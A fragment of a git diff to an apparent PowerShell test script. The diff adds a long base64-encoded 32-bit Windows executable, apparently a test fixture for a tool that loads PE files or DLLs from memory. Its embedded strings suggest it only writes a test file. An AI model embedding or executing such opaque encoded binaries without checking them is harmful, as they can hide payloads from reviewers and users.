AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAABEAQAACjATMB0wIjAnMDAwNzBXMGQwmzCoMLMw7zD/MB4xKjEwMUIxTDFVMV8xZTFuMXQxeTF+MYMxizGQMaIxqjGwMbwxxzHQMdox4THnMewx8TH2MfsxATIJMh0yNzJXMmkycTJ2MnsynTKjMqoyrzK8Mssy0zLbMu8y9TL6MgIzCDMOMxszITMrM0ozUDNaM2AzaTNuM8sz2jPgM0Y0SzRdNHs0jzSVNEA1WzVnNXY1fzWMNbs1wzXPNeA16zXwNfU1DDYbNiE2NDZJNlQ2ajaENo42yjbPNuo27zYwNzY3QTdeN6k3rje+N8Q3yjfQN9Y33DfiN+g3+DcBOAg4GzhTOFk4XzhlOGs4cTh4OH84hjiNOJQ4mziiOKo4sji6OMY4zzjUONo45DjuOP44DjkeOSc5Njk8OUI5SDkAAAAgAAAgAAAAsDC8MMAwxDDQMNQwVDGEMYgxpDGoMcgxAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
+	$Encoded32BitExe = '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'
 
 	$WideStrDllBytes32 = [Convert]::FromBase64String($Encoded32BitWStringDll)
 	$StrDllBytes32 = [Convert]::FromBase64String($Encoded32BitStringDll)
-- 
cgit v1.2.3